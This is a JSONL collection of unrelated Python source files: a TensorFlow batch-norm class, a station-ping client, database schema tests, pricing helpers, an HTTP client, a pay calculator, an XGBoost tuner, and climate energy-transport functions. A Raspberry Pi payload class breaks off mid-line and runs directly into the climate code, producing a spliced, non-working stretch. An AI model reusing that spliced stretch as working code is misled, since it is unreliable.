+{"seq_id":"64380839","text":"\"\"\"Batch Normalization for TensorFlow.\nParag K. Mital, Jan 2016.\"\"\"\n\nimport tensorflow as tf\n\n\nclass batch_norm(object):\n    \"\"\"Basic usage from: http://stackoverflow.com/a/33950177\n\n    Parag K. Mital, Jan 2016\n\n    Attributes\n    ----------\n    batch_size : int\n        Size of the batch. Set to -1 to fit to current net.\n    beta : Tensor\n        A 1D beta Tensor with size matching the last dimension of t.\n        An offset to be added to the normalized tensor.\n    ema : tf.train.ExponentialMovingAverage\n        For computing the moving average.\n    epsilon : float\n        A small float number to avoid dividing by 0.\n    gamma : Tensor\n        If \"scale_after_normalization\" is true, this tensor will be multiplied\n        with the normalized tensor.\n    momentum : float\n        The decay to use for the moving average.\n    name : str\n        The variable scope for all variables under batch normalization.\n    \"\"\"\n\n    def __init__(self, batch_size, epsilon=1e-5,\n                 momentum=0.1, name=\"batch_norm\"):\n        \"\"\"Summary\n\n        Parameters\n        ----------\n        batch_size : int\n            Size of the batch, or -1 for size to fit.\n        epsilon : float, optional\n            A small float number to avoid dividing by 0.\n        momentum : float, optional\n            Decay to use for the moving average.\n        name : str, optional\n            Variable scope will be under this prefix.\n        \"\"\"\n        with tf.variable_scope(name) as scope:\n            self.epsilon = epsilon\n            self.momentum = momentum\n            self.batch_size = batch_size\n            self.ema = tf.train.ExponentialMovingAverage(decay=self.momentum)\n            self.name = name\n\n    def __call__(self, x, train=True):\n        \"\"\"Applies/updates the BN to the input Tensor.\n\n        Parameters\n        ----------\n        x : Tensor\n            The input tensor to normalize.\n        train : bool, optional\n            Whether or not to train parameters.\n\n        Returns\n        -------\n        x_normed : Tensor\n            The normalized Tensor.\n        \"\"\"\n        shape = x.get_shape().as_list()\n\n        # Using a variable scope means any new variables\n        # will be prefixed with \"variable_scope/\", e.g.:\n        # \"variable_scope/new_variable\". 
Also, using\n # TensorBoard, this will make everything very\n # nicely grouped.\n with tf.variable_scope(self.name) as scope:\n self.gamma = tf.get_variable(\n \"gamma\", [shape[-1]],\n initializer=tf.random_normal_initializer(1., 0.02))\n self.beta = tf.get_variable(\n \"beta\", [shape[-1]],\n initializer=tf.constant_initializer(0.))\n\n mean, variance = tf.nn.moments(x, [0, 1, 2])\n\n return tf.nn.batch_norm_with_global_normalization(\n x, mean, variance, self.beta, self.gamma, self.epsilon,\n scale_after_normalization=True)\n","sub_path":"batch_norm.py","file_name":"batch_norm.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"32688176","text":"from ..models.url import URL\nfrom apscheduler.schedulers.base import BaseScheduler\nfrom apscheduler.triggers.interval import IntervalTrigger\nimport requests\n\n# # Register all jobs\n# for (key, value) in jobs.items():\n#\n# value['id'] = key\n# scheduler.add_job(**value)\n#\n# scheduler.add_job(\n# func=register_request,\n# trigger=IntervalTrigger(seconds=3),\n# replace_existing=True,\n# id=\"register_request\",\n# name=\"Registers station at station office\")\n#\n#\n#\n\n\nclass StationClient:\n \"\"\"\n Client for the station route of the PHT service\n \"\"\"\n\n def __init__(self, uri: URL):\n self.uri = uri\n self.register_id = \"StationClient-send_station_ping_{}\".format(uri)\n self.uri_payload = {'uri': self.uri}\n\n def register_station_ping(self, uri: URL, scheduler: BaseScheduler):\n \"\"\"\n Registers the station Client for sending regular pings to the /station PHT service\n\n \"\"\"\n scheduler.add_job(\n func=lambda: requests.post(self.uri, data=self.uri_payload),\n trigger=IntervalTrigger(seconds=3),\n id=self.register_id,\n name=\"Send Station Ping\",\n max_instances=1,\n replace_existing=True)\n\n def remove_station_ping(self, scheduler: BaseScheduler):\n scheduler.remove_job(job_id=self.register_id)\n","sub_path":"app/lib/restclient/station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"428359274","text":"import sqlite3\n\nimport tests.util as util\n\nfrom indexd.index.drivers.alchemy import SQLAlchemyIndexDriver\nfrom indexd.alias.drivers.alchemy import SQLAlchemyAliasDriver\n\n\nOLD_SQLITE = sqlite3.sqlite_version_info < (3, 7, 16)\n\nINDEX_HOST = \"index.sq3\"\nALIAS_HOST = \"alias.sq3\"\n\nINDEX_TABLES = {\n \"base_version\": [(0, \"baseid\", \"VARCHAR\", 1, None, 1)],\n \"index_record\": [\n (0, \"did\", \"VARCHAR\", 1, None, 1),\n (1, \"baseid\", \"VARCHAR\", 0, None, 0),\n (2, \"rev\", \"VARCHAR\", 0, None, 0),\n (3, \"form\", \"VARCHAR\", 0, None, 0),\n (4, \"size\", \"BIGINT\", 0, None, 0),\n (5, \"created_date\", \"DATETIME\", 0, None, 0),\n (6, \"updated_date\", \"DATETIME\", 0, None, 0),\n (7, \"file_name\", \"VARCHAR\", 0, None, 0),\n (8, \"version\", \"VARCHAR\", 0, None, 0),\n (9, \"uploader\", \"VARCHAR\", 0, None, 0),\n (10, \"description\", \"VARCHAR\", 0, None, 0),\n (11, \"content_created_date\", \"DATETIME\", 0, None, 0),\n (12, \"content_updated_date\", \"DATETIME\", 0, None, 0),\n ],\n \"index_record_hash\": [\n (0, \"did\", \"VARCHAR\", 1, None, 1),\n (1, \"hash_type\", \"VARCHAR\", 1, None, 1 if OLD_SQLITE else 2),\n (2, \"hash_value\", \"VARCHAR\", 0, None, 0),\n ],\n \"index_record_url\": [\n (0, \"did\", \"VARCHAR\", 1, None, 1),\n (1, \"url\", \"VARCHAR\", 1, None, 1 if 
OLD_SQLITE else 2),\n ],\n \"index_schema_version\": [(0, \"version\", \"INTEGER\", 1, None, 1)],\n \"drs_bundle_record\": [\n (0, \"bundle_id\", \"VARCHAR\", 1, None, 1),\n (1, \"name\", \"VARCHAR\", 0, None, 0),\n (2, \"created_time\", \"DATETIME\", 0, None, 0),\n (3, \"updated_time\", \"DATETIME\", 0, None, 0),\n (4, \"checksum\", \"VARCHAR\", 0, None, 0),\n (5, \"size\", \"BIGINT\", 0, None, 0),\n (6, \"bundle_data\", \"TEXT\", 0, None, 0),\n (7, \"description\", \"TEXT\", 0, None, 0),\n (8, \"version\", \"VARCHAR\", 0, None, 0),\n (9, \"aliases\", \"VARCHAR\", 0, None, 0),\n ],\n}\n\nALIAS_TABLES = {\n \"alias_record\": [\n (0, \"name\", \"VARCHAR\", 1, None, 1),\n (1, \"rev\", \"VARCHAR\", 0, None, 0),\n (2, \"size\", \"BIGINT\", 0, None, 0),\n (3, \"release\", \"VARCHAR\", 0, None, 0),\n (4, \"metastring\", \"VARCHAR\", 0, None, 0),\n (5, \"keeper_authority\", \"VARCHAR\", 0, None, 0),\n ],\n \"alias_record_hash\": [\n (0, \"name\", \"VARCHAR\", 1, None, 1),\n (1, \"hash_type\", \"VARCHAR\", 1, None, 1 if OLD_SQLITE else 2),\n (2, \"hash_value\", \"VARCHAR\", 0, None, 0),\n ],\n \"alias_record_host_authority\": [\n (0, \"name\", \"VARCHAR\", 1, None, 1),\n (1, \"host\", \"VARCHAR\", 1, None, 1 if OLD_SQLITE else 2),\n ],\n \"alias_schema_version\": [(0, \"version\", \"INTEGER\", 1, None, 1)],\n}\n\nINDEX_CONFIG = {\"driver\": SQLAlchemyIndexDriver(\"sqlite:///index.sq3\")}\n\nALIAS_CONFIG = {\"driver\": SQLAlchemyAliasDriver(\"sqlite:///alias.sq3\")}\n\n\n@util.removes(INDEX_HOST)\ndef test_sqlite3_index_setup_tables():\n \"\"\"\n Tests that the SQLite3 index database gets set up correctly.\n \"\"\"\n SQLAlchemyIndexDriver(\"sqlite:///index.sq3\")\n\n with sqlite3.connect(INDEX_HOST) as conn:\n c = conn.execute(\n \"\"\"\n SELECT name FROM sqlite_master WHERE type = 'table'\n \"\"\"\n )\n\n tables = [i[0] for i in c]\n\n for table in INDEX_TABLES:\n assert table in tables, \"{table} not created\".format(table=table)\n\n for table, schema in list(INDEX_TABLES.items()):\n # NOTE PRAGMA's don't work with parameters...\n c = conn.execute(\n \"\"\"\n PRAGMA table_info ('{table}')\n \"\"\".format(\n table=table\n )\n )\n\n assert schema == [i for i in c]\n\n\n@util.removes(ALIAS_HOST)\ndef test_sqlite3_alias_setup_tables():\n \"\"\"\n Tests that the SQLite3 alias database gets set up correctly.\n \"\"\"\n SQLAlchemyAliasDriver(\"sqlite:///alias.sq3\")\n\n with sqlite3.connect(ALIAS_HOST) as conn:\n c = conn.execute(\n \"\"\"\n SELECT name FROM sqlite_master WHERE type = 'table'\n \"\"\"\n )\n\n tables = [i[0] for i in c]\n\n for table in ALIAS_TABLES:\n assert table in tables, \"{table} not created\".format(table=table)\n\n for table, schema in list(ALIAS_TABLES.items()):\n # NOTE PRAGMA's don't work with parameters...\n c = conn.execute(\n \"\"\"\n PRAGMA table_info ('{table}')\n \"\"\".format(\n table=table\n )\n )\n\n assert schema == [i for i in c]\n","sub_path":"tests/test_setup.py","file_name":"test_setup.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"797672","text":"# Copyright (c) 2014, Adaptiv Design\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n\n# 2. 
Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n\n# 3. Neither the name of the copyright holder nor the names of its contributors\n# may be used to endorse or promote products derived from this software without\n# specific prior written permission.\n\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nfrom sellmo.utils.text import underscore_concat\n\nfrom .price import Price\nfrom .currency import Currency\nfrom .constants import AMOUNT_FIELD, CURRENCY_FIELD\n\n\ndef resolve_components(components):\n if components is True:\n return list(Price.COMPONENTS)\n elif not components:\n return []\n elif isinstance(components, (list, tuple, set)):\n return [\n component\n for component in Price.COMPONENTS if component in components\n ]\n else:\n raise ValueError(components)\n\n\ndef resolve_currencies(currencies):\n if currencies is True:\n return list(Currency.get_all())\n elif not currencies:\n return False\n elif isinstance(currencies, (list, tuple, set)):\n return [\n currency for currency in Currency.get_all() if currency in currencies\n ]\n else:\n raise ValueError(currencies)\n\n\ndef price_field_name(name, currency=None, component=None, multiplicity=None):\n parts = [name]\n if currency is not None:\n parts.append(currency)\n if component is not None:\n if multiplicity is not None and multiplicity > 1:\n component = '%s%s' % (component, multiplicity)\n parts.append(component)\n else:\n parts.append(AMOUNT_FIELD)\n\n return underscore_concat(*parts)\n\n\ndef currency_field_name(name):\n return underscore_concat(name, CURRENCY_FIELD)\n\n\ndef is_default_currency(currency):\n return currency == Currency.default()\n\n\ndef price_field_names(\n name,\n multi_currency=False,\n currencies=True,\n components=None,\n extra_fields=False,\n components_only=False\n):\n\n result = []\n currencies = resolve_currencies(currencies)\n components = resolve_components(components)\n if multi_currency:\n for currency in currencies:\n if not components_only:\n result.append(price_field_name(name, currency=currency))\n for component in components:\n for multiplicity in range(1, component.multiplicity + 1):\n field_name = price_field_name(\n name,\n currency=currency,\n component=component,\n multiplicity=multiplicity\n )\n result.append(field_name)\n if extra_fields:\n for extra_field_name in component.extra_fields:\n full_extra_field_name = underscore_concat(\n field_name, extra_field_name\n )\n result.append(full_extra_field_name)\n else:\n if not components_only:\n result.append(price_field_name(name))\n result.append(currency_field_name(name))\n for component in components:\n for multiplicity in range(1, 
component.multiplicity + 1):\n                field_name = price_field_name(\n                    name,\n                    component=component,\n                    multiplicity=multiplicity\n                )\n                result.append(field_name)\n                if extra_fields:\n                    for extra_field_name in component.extra_fields:\n                        full_extra_field_name = underscore_concat(\n                            field_name, extra_field_name\n                        )\n                        result.append(full_extra_field_name)\n\n    return result\n","sub_path":"sellmo/apps/pricing/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"427106914","text":"import json\r\nimport requests\r\nimport os\r\nfrom src.exceptions.server_failure_exception import ServerFailureException\r\nfrom src.exceptions.not_authorized_exception import NotAuthorizedException\r\n\r\n\r\nclass HttpClient:\r\n\r\n    DEFAULT_TIMEOUT = 90\r\n    server_url = None\r\n\r\n    def __init__(self, server_url):\r\n        self.server_url = server_url\r\n\r\n    def post_to_server(self, servlet_name, json_request):\r\n        url = self.construct_url(self.server_url, servlet_name)\r\n        headers = {'content-type': 'application/json'}\r\n        response = requests.post(url, data=json.dumps(json_request), headers=headers, timeout=self.DEFAULT_TIMEOUT)\r\n\r\n        if response is None:\r\n            raise ServerFailureException(\r\n                \"The server failed to respond at \" + self.server_url + \". Is the server listening at this location?\")\r\n\r\n        response_json = json.loads(response.text)\r\n\r\n        if response.status_code == 401:\r\n            raise NotAuthorizedException(response_json['results'])\r\n\r\n        if not response.ok and \"results\" not in response_json:\r\n            raise ServerFailureException(\r\n                \"The server responded at \" + self.server_url + \" with an unknown error!\")\r\n\r\n        return response_json\r\n\r\n    def construct_url(self, server_url, servlet_name):\r\n        finalized_url = None\r\n        base_url = server_url\r\n        query_string = \"\"\r\n\r\n        if \"?\" in server_url:\r\n            url_comps = server_url.split(\"?\")\r\n            base_url = url_comps[0]\r\n            if len(url_comps) >= 2:\r\n                query_string = \"?\" + url_comps[1]\r\n\r\n        finalized_url = base_url + \"/\" + servlet_name + query_string\r\n        return finalized_url\r\n","sub_path":"src/httpexecutor/http_client.py","file_name":"http_client.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"114145447","text":"# Author: Carlos Martínez Rodríguez\n# Description: Calculate a worker's pay, including overtime\n\n# Function that calculates the regular pay for hours worked\ndef calcularPagoNormal(horasNormales, pagoHora):\n    total = horasNormales * pagoHora\n    return total\n# Function that calculates the overtime pay, applying the 75% overtime premium\ndef calcularPagoExtra(horasExtras, pagoHora):\n    total = horasExtras * (pagoHora * 1.75)\n    return total\n\ndef main():\n    # User input\n    horasNormales = int(input(\"Enter the regular hours worked: \"))\n    horasExtras = int(input(\"Enter the overtime hours worked: \"))\n    pagoHora = int(input(\"Enter the hourly wage: \"))\n    # Calculate regular pay, overtime pay, and the total of both\n    totalHorasN = calcularPagoNormal(horasNormales, pagoHora)\n    totalHorasE = calcularPagoExtra(horasExtras, pagoHora)\n    totalPago = totalHorasN + totalHorasE\n    # Print results\n    print(\"Regular pay: $%.02f\" % totalHorasN)\n    print(\"Overtime pay: $%.02f\" % totalHorasE)\n    print(\"---------------\")\n    print(\"Total: $%.02f\" % totalPago)\n\nmain()","sub_path":"PagoTrabajador.py","file_name":"PagoTrabajador.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
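# A quick illustration (not part of the original modules) of how
# HttpClient.construct_url above splices the servlet name in front of an existing
# query string; the URLs are made-up examples.
client = HttpClient('http://localhost:8080/app?token=abc')
print(client.construct_url(client.server_url, 'status'))
# -> http://localhost:8080/app/status?token=abc
print(client.construct_url('http://localhost:8080/app', 'status'))
# -> http://localhost:8080/app/status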
+{"seq_id":"583310973","text":"import numpy as np\nfrom sklearn.model_selection import GridSearchCV\nfrom xgboost.sklearn import XGBRegressor\n\n\ndef tune_xgb(params, n, x_train, y_train, cv):\n\n    # if the parameter is a range, expand the range; otherwise keep the number\n    grid = {}\n    for i in params:\n        if type(params[i]) in [list, tuple]:\n            grid[i] = []\n            if i in ['max_depth', 'n_estimators']:\n                by = int((params[i][1] - params[i][0])/n)\n                if by < 1:\n                    by = 1\n                rg = range(params[i][0], params[i][1], by)\n            else:\n                rg = np.linspace(params[i][0], params[i][1], n)\n            for j in range(0, len(rg)):\n                grid[i].append(rg[j])\n\n    # mean value of each parameter range, used as the initial guess\n    mean = {}\n    for i in params:\n        if i in ['max_depth', 'n_estimators']:\n            mean[i] = int(np.mean(params[i]))\n        else:\n            mean[i] = np.mean(params[i])\n\n    est = XGBRegressor(colsample_bytree=mean['colsample_bytree'],\n                       gamma=mean['gamma'],\n                       learning_rate=mean['learning_rate'],\n                       max_depth=mean['max_depth'],\n                       min_child_weight=mean['min_child_weight'],\n                       n_estimators=mean['n_estimators'],\n                       reg_alpha=mean['reg_alpha'],\n                       reg_lambda=mean['reg_lambda'],\n                       subsample=mean['subsample'])\n\n    # Use sklearn's grid search to evaluate the best parameters\n    gsearch = GridSearchCV(estimator=est, param_grid=grid, scoring='neg_mean_squared_error', cv=cv)\n\n    gsearch.fit(x_train, y_train)\n\n    print('XGBOOST TUNING')\n    # print('Scores: ', gsearch.cv_results_)\n    print('Best parameters', gsearch.best_estimator_)\n    print('Best score', gsearch.best_score_)\n\n    return gsearch.best_estimator_\n","sub_path":"tunexgboost.py","file_name":"tunexgboost.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"46210408","text":"from struct import Struct\nfrom enum import Enum, auto, unique\nimport logging\nimport binascii\nlogging.basicConfig(level=logging.INFO,\n                    format='%(asctime)s - %(levelname)s - %(message)s')\n\n# VERSIONING\n# change version in BaseFormat for all data,\n# i.e. if any of DataFormat, CommandFormat or AlarmFormat change,\n# then change the RPI_VERSION\n\nclass BaseFormat():\n    def __init__(self):\n        self._RPI_VERSION = 0xA1\n        self._byteArray = None\n        self._type = PAYLOAD_TYPE.UNSET\n        self._version = 0\n\n    @property\n    def byteArray(self):\n        return self._byteArray\n\n    @byteArray.setter\n    def byteArray(self, value):  # a setter receives the assigned value as an argument\n        print(\"Use fromByteArray to change this\")\n\n    # check for mismatch between pi and microcontroller version\n    def checkVersion(self):\n        if self._RPI_VERSION != self._version:\n            self._version_error = True\n        else:\n            self._version_error = False\n\n    def getSize(self):\n        return len(self._byteArray)\n\n    def getType(self):\n        return self._type\n\n\n# =======================================\n# data type payload\n# =======================================\nclass DataFormat(BaseFormat):\n\n    # define the format here, including version\n    def __init__(self):\n        super().__init__()\n        # struct will set the num bytes per variable\n        # B = unsigned char = 1 byte\n        # x = padding = 1 byte (lowercase x is the struct pad code)\n        # H = unsigned short = 2 bytes\n        # I = unsigned int = 4 bytes\n        # < = little endian\n        # > = big endian\n        # ! = network format (big endian)\n        self._dataStruct = Struct("= minLat
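# A small round-trip (not part of the original module) with the standard-library
# Struct, showing how the format codes listed above compose. '<BBH' is an
# illustrative format only; DataFormat's own format string is cut off in this
# record.
from struct import Struct

s = Struct('<BBH')               # little endian: two unsigned chars, one unsigned short
packed = s.pack(0xA1, 3, 1024)   # e.g. a version byte, a type byte, a 2-byte value
print(s.size)                    # 4 bytes in total
version, ptype, value = s.unpack(packed)
assert (version, ptype, value) == (0xA1, 3, 1024)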
\n    b = globalLats <= maxLat\n    e = a*b\n    bandLats = globalLats[e]\n    foundIndexMinLat = False\n    foundIndexMaxLat = False\n    i = 0 #Loop counter\n    while foundIndexMinLat == False:\n        if e[i] == True:\n            indexMinLat = i\n            foundIndexMinLat = True\n        i += 1\n    i = 1 #With negative indices this starts at the end\n    while foundIndexMaxLat == False:\n        if e[-i] == True:\n            indexMaxLat = len(e)-i\n            foundIndexMaxLat = True\n        i += 1\n    #Now retrieving the data in the band--at all times\n    globalData = Data.variables[varname][:]\n    bandData = globalData[:, indexMinLat:indexMaxLat+1, :]\n    #Now, calculating weights and replicating them to the 3D array\n    areaWeights = np.cos(bandLats*np.pi/180)\n    areaWeights3D = np.swapaxes(np.tile(areaWeights,\n                                (np.shape(bandData)[0],np.shape(bandData)[2],1)),\n                                1,2)\n    #Now calculating the weighted mean\n    weighted3DMatrix = bandData*areaWeights3D\n    sumWeighted = np.sum(weighted3DMatrix, axis=(1,2))\n    sumWeights3D = np.sum(areaWeights3D, axis=(1,2))\n    weightedMean = sumWeighted/sumWeights3D\n    return weightedMean\n    \n\n# The following three functions calculate meridional transport of latent, \n# geopotential and thermal energy from daily output for meridional wind, \n# geopotential height, specific humidity, and air temperature, and take\n# a mean over a specified range of days. \n#\n# Inputs: \n# data_va: NetCDF Dataset object for the daily meridional wind output (m/s)\n# data_ta: NetCDF Dataset object for the daily temperature output (K)\n# data_hus: NetCDF Dataset object for the daily specific humidity output (kg/kg)\n# data_zg: NetCDF Dataset object for the daily geopotential height output (m)\n# firstDay: first day of the multi-day mean (measured from 0)\n# lastDay: last day of the multi-day mean (measured from 0)\n#\n# Outputs: 3D NumPy arrays (plev, lat, lon) of energy fluxes in J/kg*m/s\n# \n# Input dimensions: time, plev, lat, lon (in NetCDF Dataset object)\n\ndef meridionalTransportLatentEnergyMultiDayMean(data_va, data_hus, firstDay, lastDay):\n    #Physical constants\n    Lv = 2.5e6 #Latent heat of vaporization at 0 deg C (J/kg (H2O))\n    #Extract data from the NetCDF files\n    va = data_va.variables['va'][firstDay:lastDay+1,:,:,:] #m/s\n    q = data_hus.variables['hus'][firstDay:lastDay+1,:,:,:] #kg (H2O)/kg (air)\n    #Multiply specific humidity by meridional velocity to get the moisture flux\n    vq = va*q #kg/kg*m/s\n    #Take time mean\n    vqbar = np.mean(vq,axis=0)\n    #Multiply by Lv to get in energy units\n    Lvqbar = Lv*vqbar #J/kg*m/s\n    return Lvqbar\n\ndef meridionalTransportGeopotentialEnergyMultiDayMean(data_va, data_zg, firstDay, lastDay):\n    #Physical constants\n    g = 9.81 #gravitational acceleration (m s^-2)\n    #Extract data from the NetCDF files\n    va = data_va.variables['va'][firstDay:lastDay+1,:,:,:] #m/s\n    zg = data_zg.variables['zg'][firstDay:lastDay+1,:,:,:] #m\n    #Multiply together to get flux\n    vz = va*zg #m^2/s\n    #Take time mean\n    vzbar = np.mean(vz,axis=0)\n    #Multiply by g to get in energy units\n    gvzbar = g*vzbar #m^3/s^3 (J = kg * m^2/s^2 so this is J/kg*m/s)\n    return gvzbar \n    \n\ndef meridionalTransportThermalEnergyMultiDayMean(data_va, data_ta, firstDay, lastDay):\n    #Physical constants\n    Cp = 1004. 
#Heat capacity of air at constant pressure (J kg^-1 K^-1)\n #Extract data from the NetCDF files\n va = data_va.variables['va'][firstDay:lastDay+1,:,:,:] #m/s\n ta = data_ta.variables['ta'][firstDay:lastDay+1,:,:,:] #K\n #Multiply together to get flux\n vt = va*ta #K*m/s\n #Take time mean\n vtbar = np.mean(vt,axis=0)\n #Multiply by Cp to get in energy units\n Cpvtbar = Cp*vtbar #J/kg*m/s\n return Cpvtbar\n \n#Generic function to do zonal and vertical integration for the quantities computed by the above functions. \n#\n# Inputs: \n# flux: 3D array of energy fluxes (units: J/kg*m/s) computed by above 3 functions (dimensions: plev, lat, lon)\n# plev: the pressure levels in Pa\n# lat: the latitudes in degrees\n# lon: the longitudes in degrees\ndef meridionalTransportZonalVerticalIntegration(flux,plev,lat,lon):\n g = 9.81 #gravitational acceleration (m s^-2)\n a = 6.37e6 #Radius of earth (meters)\n #First do vertical integration (= integral of flux*dp/g (see Overland et al., 1996, eq. 1))\n pdiff = -1.*np.diff(plev) #Differences between the pressure levels (Pa) (listed descending so flip sign)\n fluxInterp = (flux[0:len(plev)-1,:,:]+flux[1:len(plev),:,:])/2. #Average flux values midway between pressure levels\n verticallyIntegratedFlux = np.sum(fluxInterp*pdiff[:,None,None]/g, axis=0) #Vertically integrated flux (W/m) (lat,lon)\n #Now do zonal integration (= integral of vertically integrated flux * dx)\n lonDiff = lon[1]-lon[0] \n gridCellWidth = (lonDiff*np.pi/180.)*a*np.cos(lat*np.pi/180.) #Width of each grid cell (m) (1-D array, dimension: lat)\n zonallyIntegratedFlux = np.sum(verticallyIntegratedFlux*gridCellWidth[:,None],axis=1) #Northward energy transport (W) (lat)\n return zonallyIntegratedFlux\n \n# Alternative version of above function that uses original flux values and weights according to distance between \n# midpoints between pressure levels (to avoid mask \"bleeding\" into level above bottom, if bottom masked due to terrain) \ndef meridionalTransportZonalVerticalIntegrationV2(flux,plev,lat,lon):\n g = 9.81 #gravitational acceleration (m s^-2)\n a = 6.37e6 #Radius of earth (meters)\n #First do vertical integration (= integral of flux*dp/g (see Overland et al., 1996, eq. 1))\n pMidpoints = (plev[0:len(plev)-1]+plev[1:len(plev)])/2.\n pWeights = -1.*np.diff(pMidpoints) #Differences between the pressure levels (Pa) (listed descending so flip sign)\n pWeights = np.append(plev[0]-pMidpoints[0], pWeights)\n pWeights = np.append(pWeights, pMidpoints[-1])\n #print(plev) #Debug\n #print(pWeights) #Debug\n verticallyIntegratedFlux = np.sum(flux*pWeights[:,None,None]/g, axis=0) #Vertically integrated flux (W/m) (lat,lon)\n #Now do zonal integration (= integral of vertically integrated flux * dx)\n lonDiff = lon[1]-lon[0] \n gridCellWidth = (lonDiff*np.pi/180.)*a*np.cos(lat*np.pi/180.) #Width of each grid cell (m) (1-D array, dimension: lat)\n zonallyIntegratedFlux = np.sum(verticallyIntegratedFlux*gridCellWidth[:,None],axis=1) #Northward energy transport (W) (lat)\n return zonallyIntegratedFlux\n \n# Function to calculate the multi-model mean when you have arrays that are functions of latitudes \n# (e.g. zonal mean, northward energy transport) for multiple models. This function first interpolates\n# each model's output to a common grid, then averages over the different models. 
\n#\n# Inputs: \n# arrayDict: dictionary containing the 1-D arrays that vary as a function of latitude\n# latDict: dictionary containing the 1-D arrays of latitudes\n# interpLats: latitudes to interpolate to\n# \n# The 2 dictionaries should have identical keys designating which model the data is from.\n# Should be both the same size.\ndef multiModelMeanLatitudeVarying(arrayDict, latDict, interpLats):\n #interpLats = np.linspace(-90.,90.,181) #Interpolate to 1-degree grid #No-make this an argument\n interpMat = np.zeros((len(arrayDict.keys()),len(interpLats))) #Fill this matrix one model at a time\n i = 0\n for key in arrayDict.keys():\n interpMat[i,:] = np.interp(interpLats, latDict[key], arrayDict[key])\n i = i + 1\n multiModelMean = np.mean(interpMat, axis=0)\n return multiModelMean\n \n# Function to regrid 2D arrays with latitude-pressure dimensions to a common \n# set of latitudes (assuming the pressure levels are all the same).\n#\n# This is analogous to the function above called \"multiModelMeanLatitudeVarying\" \n# but does loop of np.interp over the different pressure levels.\n# \n# Inputs: \n# arrayDict: dictionary containing the 2-D arrays that vary as a function of latitude and pressure\n# (dimensions in that order)\n# latDict: dictionary containing the 1-D arrays of latitudes for each model\n# interpLats: latitudes to interpolate to\n# numLevels: number of pressure levels (too hard to extract from the dict without knowing variable name)\n# (default 17: this is the number of standard CMIP5 pressure levels)\n#\n# Returns:\n# A 3D array with dimensions (lat, height, model) \n# Order of models not guaranteed.\n# \n# Also doesn't do mean over the models (do that in script). \n# The \"arraySignAgreement3D\" function should work for output from this, as well \n# as for the lat-lon version.\ndef collocateModelsLatitudePressure(arrayDict, latDict, interpLats, numLevels=17):\n i = 0 #Loop counter for models\n for key in arrayDict.keys():\n print('Interpolating to common latitudes for model: ' + modelNames[key])\n if i == 0: \n array3D = np.zeros((len(interpLats), numLevels, len(arrayDict.keys()))) #initialize array to return\n for j in np.arange(numLevels): #Loop over pressure levels\n #print(j)\n# print(np.shape(interpLats))\n# print(np.shape(latDict[key]))\n# print(np.shape(arrayDict[key]))\n# print(interpLats)\n# print(latDict[key])\n# print(arrayDict[key])\n array3D[:,j,i] = np.interp(interpLats, latDict[key], arrayDict[key][j,:])\n i = i + 1\n return array3D\n \n \n \n# Functions for taking multi-model statistics (means, agreement on sign, etc.) \n# on lat-lon grid. \n# General strategy is to loop through the models, \n# regrid the model output to a specific grid, and save to a 3D array (lat, lon, model). \n# Return this in one function; then have other functions that calculate things like \n# agreement.\n \n# Function to create a 3D array of regridded data, given dicts of model data, lats and lons, (which must all have same keys), \n# and lats and lons to interpolate to (lats and lons are 1D arrays).\n# The order of the models will be dependent on the input dicts, so I shouldn't write any code that assumes the order matters. \n# This uses the scipi.interpolate.griddata function, with the default linear interpolation.\n#\n# Required some reshaping to make data \"unstructured\". See \"griddataTest.py\" to understand the logic of this. \n# This seems to run reasonably fast, for interpolating to 2-degree grid. 
